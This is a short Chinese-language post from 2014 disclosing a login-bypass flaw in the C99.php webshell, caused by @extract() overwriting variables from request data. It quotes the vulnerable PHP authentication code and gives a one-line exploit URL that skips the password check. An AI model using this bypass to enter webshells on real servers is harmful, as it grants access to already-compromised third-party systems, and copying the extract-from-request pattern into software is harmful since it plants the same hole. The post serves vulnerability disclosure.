2014-06-25 13:40:00

[zone]C99.PHP webshell 绕过登陆密码漏洞

from:http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/ 、http://zone.wooyun.org/content/13257

C99.php存在一个漏洞可以绕过登陆密码直接登陆的漏洞。 
http://127.0.0.1/c99.php?c99shcook[login]=0
可直接登陆。 
@extract($_REQUEST["c99shcook"]);
变量覆盖 
if ($login) { 
    if (empty($md5_pass)) { 
        $md5_pass = md5($pass); 
    } 
    if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { 
        if ($login_txt === false) { 
            $login_txt = ""; 
        } elseif (empty($login_txt)) { 
            $login_txt = strip_tags(ereg_replace(" |<br>", " ", $donated_html)); 
        } 
        header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\""); 
        header("HTTP/1.0 401 Unauthorized"); 
        exit($accessdeniedmess); 
    } 
}
发表回复